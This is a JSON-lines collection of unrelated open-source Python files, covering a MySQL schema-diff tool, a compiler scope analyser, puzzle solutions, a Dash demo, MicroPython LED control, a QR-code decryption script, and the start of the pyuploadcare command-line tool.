old_key_obj.type.lower() \\\n or new_key_obj.len != old_key_obj.len \\\n or new_key_obj.default.lower() != old_key_obj.default.lower() \\\n or new_key_obj.unsigned != old_key_obj.unsigned \\\n or new_key_obj.comment != old_key_obj.comment:\n sql_str += (\"ALTER TABLE %s MODIFY \"%(table_name) + key_obj_get_sql(new_key_obj))\n # 删除的字段\n for key_name in old_table.key_map:\n if key_name not in new_table.key_map:\n sql_str += (\"ALTER TABLE %s DROP %s;\\n\")%(table_name, key_name)\n \n # 索引\n # 主键\n primary_key_sql = \"\"\n new_primary_key = new_table.primary_key\n old_primary_key = old_table.primary_key\n if not new_primary_key and not old_primary_key:\n # 新表,旧表主键都不存在\n pass\n elif new_primary_key and not old_primary_key:\n # 新表主键存在 旧表主键不存在\n # 添加主键\n primary_key_str = \",\".join(new_primary_key.field)\n primary_key_sql = \"ALTER TABLE {0} ADD PRIMARY KEY ({1});\\n\".format(\n table_name\n , primary_key_str\n )\n elif new_primary_key and old_primary_key:\n # 新表主键存在 旧表主键也存在\n if not list_is_same(new_primary_key.field, old_primary_key.field):\n # 主键不一致\n primary_key_sql = \"ALTER TABLE {0} DROP PRIMARY KEY;\\n\".format(table_name)\n primary_key_str = \",\".join(new_primary_key.field)\n primary_key_sql += \"ALTER TABLE {0} ADD PRIMARY KEY ({1});\\n\".format(\n table_name\n , primary_key_str\n )\n elif not new_primary_key and old_primary_key:\n # 新表主键不存在 旧表主键存在\n primary_key_sql = \"ALTER TABLE {0} DROP PRIMARY KEY;\\n\".format(table_name)\n sql_str += primary_key_sql\n \n # 联合键\n # 添加和修改的键\n new_unique_key = new_table.unique_key\n old_unique_key = old_table.unique_key\n for tmp_key in new_unique_key:\n unique_key_str = \",\".join(new_unique_key[tmp_key].field)\n if tmp_key not in old_unique_key:\n # 旧表不存在\n sql_str += \"ALTER TABLE {0} ADD UNIQUE {1}({2});\\n\".format(table_name, tmp_key, unique_key_str)\n elif not list_is_same(old_unique_key[tmp_key].field, new_unique_key[tmp_key].field):\n # 键存在,但值不一致\n sql_str += \"ALTER TABLE {0} DROP INDEX {1};\\n\".format(table_name, tmp_key)\n sql_str += \"ALTER TABLE {0} ADD UNIQUE {1}({2});\\n\".format(table_name, tmp_key, unique_key_str)\n # 删除的键\n for tmp_key in old_unique_key:\n if tmp_key not in new_unique_key:\n sql_str += \"ALTER TABLE {0} DROP INDEX {1};\\n\".format(table_name, tmp_key)\n \n # 普通键\n new_ordinary_key = new_table.ordinary_key\n old_ordinary_key = old_table.ordinary_key\n for tmp_key in new_ordinary_key:\n ordinary_key_str = \",\".join(new_ordinary_key[tmp_key].field)\n if tmp_key not in old_ordinary_key:\n # 旧表不存在\n sql_str += \"ALTER TABLE {0} ADD INDEX {1}({2});\\n\".format(table_name, tmp_key, ordinary_key_str)\n elif not list_is_same(old_ordinary_key[tmp_key].field, new_ordinary_key[tmp_key].field):\n # 键存在,但值不一致\n sql_str += \"ALTER TABLE {0} DROP INDEX {1};\\n\".format(table_name, tmp_key)\n sql_str += \"ALTER TABLE {0} ADD INDEX {1}({2});\\n\".format(table_name, tmp_key, ordinary_key_str)\n # 删除的键\n for tmp_key in old_ordinary_key:\n if tmp_key not in new_ordinary_key:\n sql_str += \"ALTER TABLE {0} DROP INDEX {1};\\n\".format(table_name, tmp_key)\n \n # 表的属性\n # 暂时不考虑改这个\n return sql_str\n\n# 获取字段类对应sql\ndef key_obj_get_sql(key_obj):\n # 类型可能没有长度\n type_str = \"\"\n if key_obj.len == 0:\n type_str = key_obj.type\n else:\n type_str = \"{0}({1}) {2}\".format(key_obj.type, key_obj.len, key_obj.unsigned)\n \n sql_str = \"{0} {1} {2}\".format(\n key_obj.key_name\n , type_str\n , key_obj.not_null\n )\n # 是否有默认值\n if key_obj.default != \"\":\n sql_str += \" DEFAULT '%s'\"%(key_obj.default)\n # 是否有注释\n if key_obj.comment != \"\":\n sql_str += \" COMMENT '%s'\"%(key_obj.comment)\n sql_str += \";\\n\"\n return sql_str\n\n# 两个表内容是否一致,顺序不需要一致\ndef list_is_same(a_list, b_list):\n if len(a_list) != len(b_list):\n return False\n \n # 遍历元素\n for item in a_list:\n if item not in b_list:\n return False\n return True\n\n# 字符串列表删除字符串空白\ndef list_del_blank(list):\n new_list = []\n for tmp in list:\n tmp = tmp.strip()\n new_list.append(tmp)\n return new_list\n\n# 获取两个字符串间的字符串\ndef get_str_by_begin_end(sql_str:str, begin_str:str, end_str:str):\n begin_idx = sql_str.find(begin_str)\n if begin_idx == -1:\n return \"\",sql_str\n begin_idx = begin_idx + len(begin_str)\n end_idx = sql_str.find(end_str, begin_idx)\n if end_idx == -1:\n return \"\",sql_str\n else:\n return sql_str[begin_idx : end_idx], sql_str[end_idx:]","repo_name":"huangwenzi/mysql_diff","sub_path":"db_tool.py","file_name":"db_tool.py","file_ext":"py","file_size_in_byte":15501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"2033819149","text":"import bs4\nimport re\nfrom urllib.request import urlopen\nimport favicon\n\n\ndef get_data_by_url(url):\n try:\n html = urlopen(url)\n except:\n return None\n soup = bs4.BeautifulSoup(html, 'html.parser')\n text = re.sub(r'\\s+', ' ', soup.get_text())\n icon = favicon.get(url)[0][0]\n title = soup.title.text\n return {'text': text, 'icon': icon, 'title': title}\n","repo_name":"kesha787898/LHD","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13179740144","text":"#!/usr/bin/python3\n\nfrom constants import *\nfrom grammar import GrammarDriver\nfrom grammar_rules import rules\nfrom parse_tree import ParseTreeVisitor, VariableExpression, ArrayIndexExpression, FunctionCall, FormalParameter\nfrom parser import Parser\nfrom scanner import Scanner\nfrom type_enums import VariableType, ScopeType\nfrom variable import Variable, FunctionVariable, BuiltinFunctionVariable, Function\nfrom util import print_debug\n\nfrom enum import Enum\n\nclass ScopeError(BaseException):\n def __init__(self, message, pos = None):\n self.message = message\n self.pos = pos\n\n\nclass Scope:\n def __init__(self, scope_type, parent=None):\n self.scope_type = scope_type\n self.parent = parent\n # [Variable]. The variables are gathered as a list, because we want to keep\n # them in order (for simplicity; we also want to always allocate the\n # variables in the same order to be deterministic).\n self.variables = []\n self.children = []\n\n def __getVariable(self, name):\n for v in self.variables:\n if v.name == name:\n return v\n return None\n\n def addVariable(self, variable):\n # print_debug(\"Adding variable \" + str(variable) + \" to scope \" + str(self))\n if self.__getVariable(variable.name):\n return False\n # Allow shadowing; here we explicitly don't care if some parent declares the\n # same variable. So, a variable in an if scope can shadow a variable in a\n # function.\n self.variables.append(variable)\n return True\n\n def resolve(self, name):\n # print(\"Resolving variable \" + str(name) + \" in scope \" + str(self))\n v = self.__getVariable(name)\n if v:\n return v\n # print(\"Not found, going to parent...\")\n if self.parent:\n return self.parent.resolve(name)\n return None\n\n # FIXME: add printing, add scope locations.\n\n# Base class for a parse tree visitor which knows about scopes. It either\n# creates them if the scopes don't exist, or keeps track of already created\n# scopes while walking.\nclass ScopeAnalyserVisitor(ParseTreeVisitor):\n def __init__(self, top_scope):\n super().__init__()\n self.scopes = [top_scope]\n\n def visitIfStatementBeginBody(self, statement):\n # Here we'd really like to use a pointer to the member variable, so that\n # __pushScope could assign the scope it creates into the right place.\n self.__pushScope(statement.if_scope, ScopeType.sub)\n statement.if_scope = self.scopes[0]\n\n def visitIfStatementEndBody(self, statement):\n self.__popScope()\n\n def visitIfStatementBeginElse(self, statement):\n self.__pushScope(statement.else_scope, ScopeType.sub)\n statement.else_scope = self.scopes[0]\n\n def visitIfStatementEndElse(self, statement):\n self.__popScope()\n\n def visitWhileStatementBeginBody(self, statement):\n self.__pushScope(statement.scope, ScopeType.sub)\n statement.scope = self.scopes[0]\n\n def visitWhileStatementEndBody(self, statement):\n self.__popScope()\n\n def visitFunctionStatementBeginBody(self, statement):\n self.__pushScope(statement.function.scope, ScopeType.function)\n statement.function.scope = self.scopes[0]\n\n def visitFunctionStatementEndBody(self, statement):\n self.__popScope()\n\n def currentScopeType(self):\n # Are we inside a function scope or on the top scope?\n for scope in self.scopes:\n if scope.scope_type is not ScopeType.sub:\n return scope.scope_type\n assert(False)\n\n def currentVariableAllocationScope(self):\n # Returns the innermost scope which is either function or top (not\n # sub). That's the scope where the variables will be allocated.\n for scope in self.scopes:\n if scope.scope_type is not ScopeType.sub:\n return scope\n assert(False)\n\n def currentFunctionScope(self):\n # Returns the innermost scope which is either function or top (not\n # sub). That's the scope where the variables will be allocated.\n for scope in self.scopes:\n if scope.scope_type == ScopeType.function:\n return scope\n return None\n\n def __pushScope(self, scope, scope_type):\n if scope is None:\n scope = Scope(scope_type, self.scopes[0])\n # print_debug(\"push scope \" + str(scope))\n self.scopes[0].children += [scope] # FIXME: reverse the stack, this is silly\n self.scopes = [scope] + self.scopes\n\n def __popScope(self):\n # print_debug(\"pop scope \" + str(self.scopes[0]))\n self.scopes.pop(0)\n\n\n# Creates scopes and puts functions into them.\nclass FirstPassScopeAnalyser(ScopeAnalyserVisitor):\n def __init__(self, top_scope, main_function):\n super().__init__(top_scope)\n # print_debug(\"top scope is \" + str(top_scope))\n self.__function_stack = [main_function]\n\n def visitFunctionStatement(self, s):\n # Add the function variable into the surrounding scope.\n # print_debug(\"Adding function variable \" + s.name + \" into scope \" + str(self.scopes[0]))\n name = \"\"\n for f in self.__function_stack:\n if len(name) > 0:\n name += \"__\"\n name += f.name\n unique_name = name + \"__\" + s.name\n v = FunctionVariable(s.name, unique_name, self.currentVariableAllocationScope(), s)\n if not self.scopes[0].addVariable(v):\n raise ScopeError(\"ScopeError: redeclaration of variable \" + s.name, s.pos)\n s.resolved_function = v\n f = Function(v)\n\n f.outer_function = self.__function_stack[-1]\n # print_debug(\"function \" + str(f) + \" outer function is \" + str(f.outer_function))\n f.name = s.name\n\n self.__function_stack.append(f)\n s.function = f\n\n # This will create the scope for the function.\n super().visitFunctionStatement(s)\n self.__function_stack.pop()\n\n\n\n# Uses the scopes created by FirstPassScopeAnalyser, puts variables into them\n# and resolves variables (incl. function calls).\nclass SecondPassScopeAnalyser(ScopeAnalyserVisitor):\n def __init__(self, top_scope):\n super().__init__(top_scope)\n\n @staticmethod\n def __addVariablesFromScopeChainToFunction(function, scope):\n for v in scope.variables:\n function.addVariable(v)\n for s in scope.children:\n if s.scope_type != ScopeType.function:\n SecondPassScopeAnalyser.__addVariablesFromScopeChainToFunction(function, s)\n\n def visitLetStatement(self, s):\n super().visitLetStatement(s)\n v = Variable(s.identifier, s.ttype, VariableType.variable, self.currentVariableAllocationScope())\n # print(\"Adding normal variable \" + s.identifier + \" into scope \" + str(self.scopes[0]))\n if not self.scopes[0].addVariable(v):\n raise ScopeError(\"ScopeError: redeclaration of variable \" + s.identifier, s.pos)\n s.resolved_variable = v\n\n def visitAssignmentStatement(self, s):\n super().visitAssignmentStatement(s)\n\n self.__visitVariableExpressionOrArrayIndexExpressionOrFunctionCall(s.where)\n\n def __visitVariableExpressionOrArrayIndexExpressionOrFunctionCall(self, e):\n if isinstance(e, VariableExpression):\n self.visitVariableExpression(e)\n elif isinstance(e, ArrayIndexExpression):\n self.visitArrayIndexExpression(e)\n elif isinstance(e, FunctionCall):\n self.visitFunctionCall(e)\n else:\n assert(False)\n\n def visitVariableExpression(self, e):\n v = self.scopes[0].resolve(e.name)\n if not v:\n raise ScopeError(\"ScopeError: undeclared variable \" + e.name, e.pos)\n e.resolved_variable = v\n if v.allocation_scope.scope_type == ScopeType.function and v.allocation_scope != self.currentFunctionScope():\n v.referred_by_inner_functions = True\n\n def visitArrayIndexExpression(self, e):\n self.__visitVariableExpressionOrArrayIndexExpressionOrFunctionCall(e.array)\n e.index.accept(self)\n\n def visitFunctionStatementEndBody(self, s):\n super().visitFunctionStatementEndBody(s)\n\n # Gather all local variables for the function (they might be directly in the\n # function scope or in subscopes (for while, if etc.).\n\n # For simplicity, we treat all variables the same, that is, allocate all\n # variables in the function context. A possible optimization is to stack\n # allocate variables which are not referred to by the inner functions.\n\n # FIXME: optimize so that variables which are not live at the same time can\n # share the space.\n SecondPassScopeAnalyser.__addVariablesFromScopeChainToFunction(s.function, s.function.scope)\n\n def visitFunctionCall(self, s):\n super().visitFunctionCall(s)\n\n self.__visitVariableExpressionOrArrayIndexExpressionOrFunctionCall(s.function)\n\n # We cannot check parameter count here, because we might be calling a\n # function via a variable!\n\n def visitFunctionStatementParameters(self, s):\n # TODO: parameters need to keep track of which functions they are a parameter to.\n super().visitFunctionStatementParameters(s)\n for p in s.formal_parameters.items:\n assert(isinstance(p, FormalParameter))\n assert(s.function.scope)\n v = Variable(p.name, p.ttype, VariableType.variable, s.function.scope, True)\n # Note that parameter can also be referred to by inner functions.\n if not self.scopes[0].addVariable(v):\n raise ScopeError(\"ScopeError: redeclaration of variable \" + p.name, s.pos)\n\n def visitNewExpression(self, e):\n super().visitNewExpression(e)\n self.visitFunctionCall(e.function_call)\n\n\nclass ScopeAnalyser:\n def __init__(self, parse_tree):\n self.__parse_tree = parse_tree\n self.builtins = set()\n\n def analyse(self):\n self.top_scope = Scope(ScopeType.top)\n self.__parse_tree.main_function.scope = self.top_scope\n\n for b in self.builtins:\n self.top_scope.addVariable(BuiltinFunctionVariable(b, self.top_scope))\n\n v1 = FirstPassScopeAnalyser(self.top_scope, self.__parse_tree.main_function)\n v2 = SecondPassScopeAnalyser(self.top_scope)\n try:\n v1.visitProgram(self.__parse_tree)\n v2.visitProgram(self.__parse_tree)\n self.success = True\n except ScopeError as e:\n self.success = False\n self.error = e\n","repo_name":"marjakh/SillyLittleCompiler","sub_path":"src/scope_analyser.py","file_name":"scope_analyser.py","file_ext":"py","file_size_in_byte":9853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"9602881972","text":"#!/usr/bin/env python\n# coding=UTF-8\n'''\n@Description: About practicing python exercises\n@Author: Shenhongwen\n@LastEditors: Shenhongwen\n@Date: 2019-02-28 21:01:03\n@LastEditTime: 2019-02-28 21:03:41\n'''\n\n\ndef output(s, length):\n if length == 0:\n return\n print(s[length-1])\n output(s, length-1)\n\n\ns = input('Input a string:')\nlength = len(s)\noutput(s, length)\n","repo_name":"hongwenshen/Python_Study","sub_path":"Python 100例/Python 练习实例27.py","file_name":"Python 练习实例27.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"74940478289","text":"from functools import lru_cache\nfrom hashlib import md5\nimport itertools as it\nimport re\n\n\n@lru_cache(maxsize=50_000)\ndef get_hash(s: str, rounds: int = 0) -> str:\n for _ in range(rounds + 1):\n s = md5(s.encode(\"utf-8\")).hexdigest()\n return s\n\n\ndef solve(rounds):\n three = re.compile(r\"(.)\\1{2}\")\n keys = []\n salt = \"cuanljph\"\n found = False\n for step in it.count(0):\n if found:\n break\n index = salt + str(step)\n match = re.search(three, get_hash(index, rounds=rounds))\n if match:\n five = re.compile(match[1] + r\"{5}\")\n for sub_step in range(step + 1, step + 1_001):\n index = salt + str(sub_step)\n match = re.search(five, get_hash(index, rounds=rounds))\n if match:\n keys.append(step)\n if len(keys) == 64:\n found = True\n break\n\n return step - 1\n\n\nprint(\"answer 1:\", solve(0))\nprint(\"answer 2:\", solve(2016))\n","repo_name":"daniel70/AoC","sub_path":"2016/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36634901860","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSource: https://www.datacamp.com/community/tutorials/learn-build-dash-python\r\nCore Components:\r\n Dropdown\r\n Multi-Select Dropdown\r\n Ratio Items\r\n Checklist\r\n Text Input\r\nHelp:\r\n help(dcc.Slider)\r\n\"\"\"\r\n\r\nexternal_stylesheets = [\r\n 'https://codepen.io/chriddyp/pen/bWLwgP.css',\r\n 'https://fonts.googleapis.com/css?family=Roboto&display=swap' # to load the 'Roboto' font\r\n ]\r\n\r\n# # # Core Components # # #\r\n\r\nimport dash\r\nimport dash_core_components as dcc # it has the Graph class\r\nimport dash_html_components as html # it has all the HTML tags\r\n\r\nbold_label = lambda x: html.Label(x, style={'fontWeight': 'bold'})\r\n\r\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\n\r\noptions_list = [\r\n {'label': 'New York City', 'value': 'NYC'},\r\n {'label': 'Montréal', 'value': 'MTL'},\r\n {'label': 'San Francisco', 'value': 'SF'}\r\n]\r\n\r\napp.layout = html.Div(style={'fontFamily': \"'Roboto', sans-serif;\", 'columnCount': 2}, children=[\r\n html.Div([\r\n bold_label('Dropdown'),\r\n dcc.Dropdown(\r\n options = options_list,\r\n value = 'MTL'\r\n )\r\n ]),\r\n html.Div([\r\n bold_label('Multi-Select Dropdown'),\r\n dcc.Dropdown(\r\n options = options_list,\r\n value = ['MTL', 'SF'],\r\n multi = True\r\n )\r\n ]),\r\n html.Div([\r\n bold_label('Radio Items'),\r\n dcc.RadioItems(\r\n options = options_list,\r\n value = 'MTL',\r\n ),\r\n ]),\r\n html.Div([\r\n bold_label('Checklist'),\r\n dcc.Checklist(\r\n options = options_list,\r\n value = ['MTL', 'SF']\r\n )\r\n ],\r\n style={'overflow': 'hidden'} # to avoid braking across columns \r\n ),\r\n html.Div([\r\n bold_label('Text Box'),\r\n html.Div(dcc.Input(value = 'MTL', type = 'text')),\r\n ]),\r\n html.Div([\r\n bold_label('Slider'),\r\n dcc.Slider(\r\n id='my-slider',\r\n min=0,\r\n max=10,\r\n step=0.5,\r\n value=5,\r\n marks={\r\n 0: '0',\r\n 5: '5',\r\n 10: '10'\r\n }\r\n )\r\n ]),\r\n html.Div(id='slider-output-container')\r\n])\r\n\r\n@app.callback(\r\n dash.dependencies.Output('slider-output-container', 'children'),\r\n [dash.dependencies.Input('my-slider', 'value')])\r\ndef update_output(value):\r\n return f\"You have selected {value}\"\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)","repo_name":"eltrujo/dash_basics","sub_path":"core_components.py","file_name":"core_components.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28351162532","text":"import time\nimport machine\n\n\npin_white_cold = machine.PWM(machine.Pin(5))\npin_white_warm = machine.PWM(machine.Pin(13))\npin_r = machine.PWM(machine.Pin(4))\npin_g = machine.PWM(machine.Pin(12))\npin_b = machine.PWM(machine.Pin(14))\nall_pwm_pins = (pin_r, pin_g, pin_b, pin_white_warm, pin_white_cold)\n\nCOLOUR_RANGE = (0, 255)\nPWM_RANGE = (0, 768)\n\n\ndef map(value, from_range, to_range):\n return int(\n to_range[0] + \\\n (((value - from_range[0]) / (from_range[1] - from_range[0])) * \\\n (to_range[1] - to_range[0]))\n )\n\n\ndef set_all(red, green, blue, white_cold, white_warm):\n print((red, green, blue, white_cold, white_warm))\n pin_r.duty(map(red, COLOUR_RANGE, PWM_RANGE))\n pin_g.duty(map(green, COLOUR_RANGE, PWM_RANGE))\n pin_b.duty(map(blue, COLOUR_RANGE, PWM_RANGE))\n pin_white_cold.duty(map(white_cold, COLOUR_RANGE, PWM_RANGE))\n pin_white_warm.duty(map(white_warm, COLOUR_RANGE, PWM_RANGE))\n\n\ndef off():\n for pwm_pin in all_pwm_pins:\n pwm_pin.duty(0)\n\n\ndef flash_pwm():\n off()\n\n for pwm_pin in all_pwm_pins:\n for i in range(1024):\n pwm_pin.duty(i)\n time.sleep(0.001)\n for i in reversed(range(1024)):\n pwm_pin.duty(i)\n time.sleep(0.001)\n\n\ndef flash():\n off()\n\n for pwm_pin in all_pwm_pins:\n pwm_pin.duty(1024)\n time.sleep(1)\n pwm_pin.duty(0)\n","repo_name":"carlosperate/micropython-lightbulb","sub_path":"src/leds.py","file_name":"leds.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1633813601","text":"import unittest\nfrom XiangqiGame import XiangqiGame\n\nclass TestCase(unittest.TestCase):\n # TESTS \n def test1(self):\n game = XiangqiGame()\n\n # While game state == \"UNFINISHED\"\n # choose a random red piece \n # of available moves, call make move for move \n # choose a random black piece \n # of available moves, call make move for move\n\n self.assertEqual(location, expected)\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"EMcKague/Xiangqi","sub_path":"tests_Checkmate.py","file_name":"tests_Checkmate.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1185261414","text":"# 1219. 黄金矿工\n# https://leetcode-cn.com/problems/path-with-maximum-gold/\n\nfrom typing import List\nimport copy\n\n\nclass Solution:\n def getMaximumGold(self, grid: List[List[int]]) -> int:\n\n def dfs(grid, i, j, gold) -> int:\n if i < 0 or i >= len(grid) or j < 0 or j >= len(grid[0]) or grid[i][j] <= 0:\n return gold\n\n gold += grid[i][j]\n grid[i][j] = -grid[i][j]\n\n m = max([dfs(grid, i + 1, j, gold),\n dfs(grid, i - 1, j, gold),\n dfs(grid, i, j + 1, gold),\n dfs(grid, i, j - 1, gold)])\n grid[i][j] = -grid[i][j]\n return m\n\n ans = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n newGrid = copy.deepcopy(grid)\n t = dfs(newGrid, i, j, 0)\n ans = max(ans, t)\n return ans\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n print(solution.getMaximumGold(\n [[1, 0, 7, 0, 0, 0],\n [2, 0, 6, 0, 1, 0],\n [3, 5, 6, 7, 4, 2],\n [4, 3, 1, 0, 2, 0],\n [3, 0, 5, 0, 20, 0]]\n ))\n","repo_name":"KevenGe/LeetCode-Solutions","sub_path":"problemset/1219. 黄金矿工/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"7469900343","text":"class Solution:\n def shuffle(self, nums: List[int], n: int) -> List[int]:\n nums2 = []\n for i in range(len(nums)//2,len(nums)):\n nums2.append(nums[i])\n \n \n final = []\n for i in range(len(nums2)):\n final.append(nums[i])\n final.append(nums2[i])\n \n return final\n","repo_name":"MainakRepositor/MyLeetPy","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"66"} +{"seq_id":"11552169025","text":"import cv2\nfrom cryptography.fernet import Fernet\nimport numpy as np\n\n# Load the QR code image from file\nqr_code_image = cv2.imread(\"qr_code.png\")\n\n# Create a QR code detector object\nqr_code_detector = cv2.QRCodeDetector()\n\n# Detect and decode the QR code\ndata, bbox, straight_qrcode = qr_code_detector.detectAndDecode(qr_code_image)\n\n# Print the decoded data\nprint(data)\nprint(data.split('||')[0])\nprint(data.split('||')[1])\nprint(data.split('||')[2])\n# Load the key from a file or generate a new one\nwith open('key1.key', 'rb') as file:\n key = file.read()\n\n# Create a Fernet object with the key\nfernet = Fernet(key)\n\n# Decrypt the encrypted data\ndecrypted_data = fernet.decrypt(data.split('||')[0])\ndecrypted_data1 = fernet.decrypt(data.split('||')[1])\n# Print the decrypted data\nprint(decrypted_data.decode()) \nprint(decrypted_data1.decode())\n\n","repo_name":"Kapil0021/computing_project","sub_path":"qr/finalQr/readqrco.py","file_name":"readqrco.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32604867602","text":"from mrh.my_pyscf.grad import mcpdft as mcpdft_grad\nfrom mrh.my_pyscf.df.grad import dfsacasscf as dfsacasscf_grad\nfrom mrh.my_pyscf.df.grad import rhf as dfrhf_grad\n\n# I need to resolve the __init__ and get_ham_response members. Otherwise everything should be fine! \nclass Gradients (dfsacasscf_grad.Gradients, mcpdft_grad.Gradients):\n \n def __init__(self, pdft):\n self.auxbasis_response = True\n mcpdft_grad.Gradients.__init__(self, pdft)\n\n def get_ham_response (self, state=None, atmlst=None, verbose=None, mo=None, ci=None, eris=None, mf_grad=None, veff1=None, veff2=None, **kwargs):\n if state is None: state = self.state\n if atmlst is None: atmlst = self.atmlst\n if verbose is None: verbose = self.verbose\n if mo is None: mo = self.base.mo_coeff\n if ci is None: ci = self.base.ci\n if (veff1 is None) or (veff2 is None):\n assert (False), kwargs\n veff1, veff2 = self.base.get_pdft_veff (mo, ci[state], incl_coul=True, paaa_only=True)\n fcasscf = self.make_fcasscf (state)\n fcasscf.mo_coeff = mo\n fcasscf.ci = ci[state]\n return mcpdft_grad.mcpdft_HellmanFeynman_grad (fcasscf, self.base.otfnal, veff1, veff2, mo_coeff=mo, ci=ci[state], atmlst=atmlst, mf_grad=mf_grad, verbose=verbose, auxbasis_response=self.auxbasis_response)\n\n def kernel (self, **kwargs):\n if not ('mf_grad' in kwargs):\n kwargs['mf_grad'] = dfrhf_grad.Gradients (self.base._scf)\n return mcpdft_grad.Gradients.kernel (self, **kwargs)\n\n get_wfn_response = mcpdft_grad.Gradients.get_wfn_response\n get_init_guess = mcpdft_grad.Gradients.get_init_guess\n project_Aop = mcpdft_grad.Gradients.project_Aop\n\n","repo_name":"stknecht/mrh","sub_path":"my_pyscf/df/grad/dfmcpdft.py","file_name":"dfmcpdft.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"36876732788","text":"\"\"\"Given an integer array nums and an integer k, return the k most frequent elements. You may return the answer in any order.\n\n \n\nExample 1:\n\nInput: nums = [1,1,1,2,2,3], k = 2\nOutput: [1,2]\nExample 2:\n\nInput: nums = [1], k = 1\nOutput: [1]\"\"\"\n\n\nclass Solution:\n def topKFrequent(self, nums, k):\n map = Counter(nums)\n result = [] # [num , count]\n for key, value in map.items():\n result.append([key, value])\n result.sort(key=lambda x: x[1], reverse=True)\n\n return [res[0] for res in result[:k]]\n\n","repo_name":"mageshyt/leetcode-solutions","sub_path":"Heap/347. Top K Frequent Elements.py","file_name":"347. Top K Frequent Elements.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35987190214","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n\ndef cut_rod(price, length):\n value = [0 for n in range(length+1)]\n value[0] = 0\n \n for i in range(1, length+1):\n max_value = -32000\n \n for j in range(i):\n max_value = max(max_value, price[j] + value[i-j-1])\n value[i] = max_value\n \n return value[length] \n \n \n#main code\nn = int(input(\"\"))\ntest_arr = list(map(int,input(\"\").strip().split()))[:n]\nsize = len(test_arr)\nprint(str(cut_rod(test_arr, size)))\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Rostamnezhad/cutting_rod","sub_path":"cutting_rod (1).py","file_name":"cutting_rod (1).py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30266751808","text":"#!/usr/bin/python\n# coding: utf-8\n\nfrom __future__ import unicode_literals\n\nimport argparse\nimport logging\n\nfrom pyuploadcare import __version__, conf\nfrom pyuploadcare.client import Uploadcare\nfrom pyuploadcare.exceptions import UploadcareException\nfrom pyuploadcare.ucare_cli.commands import (\n convert_document,\n convert_video,\n create_group,\n create_webhook,\n delete_files,\n delete_webhook,\n get_file,\n get_project,\n list_files,\n list_groups,\n list_webhooks,\n store_files,\n sync,\n update_webhook,\n upload,\n upload_from_url,\n)\nfrom pyuploadcare.ucare_cli.commands.helpers import pprint\nfrom pyuploadcare.ucare_cli.settings import load_config\n\n\nlogger = logging.getLogger(\"pyuploadcare\")\n\n\ndef ucare_argparser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--version\", action=\"version\", version=\"ucare {0}\".format(__version__)\n )\n\n subparsers = parser.add_subparsers()\n\n list_files.register_arguments(subparsers)\n list_groups.register_arguments(subparsers)\n get_file.register_arguments(subparsers)\n store_files.register_arguments(subparsers)\n delete_files.register_arguments(subparsers)\n upload_from_url.register_arguments(subparsers)\n upload.register_arguments(subparsers)\n sync.register_arguments(subparsers)\n create_group.register_arguments(subparsers)\n convert_video.register_arguments(subparsers)\n get_project.register_arguments(subparsers)\n convert_document.register_arguments(subparsers)\n list_webhooks.register_arguments(subparsers)\n delete_webhook.register_arguments(subparsers)\n create_webhook.register_arguments(subparsers)\n update_webhook.register_arguments(subparsers)\n\n # common arguments\n parser.add_argument(\n \"--pub_key\",\n help=\"API key, if not set is read from uploadcare.ini\"\n \" and ~/.uploadcare config files\",\n )\n parser.add_argument(\n \"--secret\",\n help=\"API secret, if not set is read from uploadcare.ini\"\n \" and ~/.uploadcare config files\",\n )\n parser.add_argument(\n \"--api_base\",\n help=\"API url, can be read from uploadcare.ini\"\n \" and ~/.uploadcare config files.\"\n \" Default value is {0}\".format(conf.api_base),\n )\n parser.add_argument(\n \"--upload_base\",\n help=\"Upload API url, can be read from uploadcare.ini\"\n \" and ~/.uploadcare config files.\"\n \" Default value is {0}\".format(conf.upload_base),\n )\n parser.add_argument(\n \"--no_check_upload_certificate\",\n action=\"store_true\",\n help=\"Don't check the uploading API server certificate.\"\n \" Can be read from uploadcare.ini\"\n \" and ~/.uploadcare config files.\",\n )\n parser.add_argument(\n \"--no_check_api_certificate\",\n action=\"store_true\",\n help=\"Don't check the 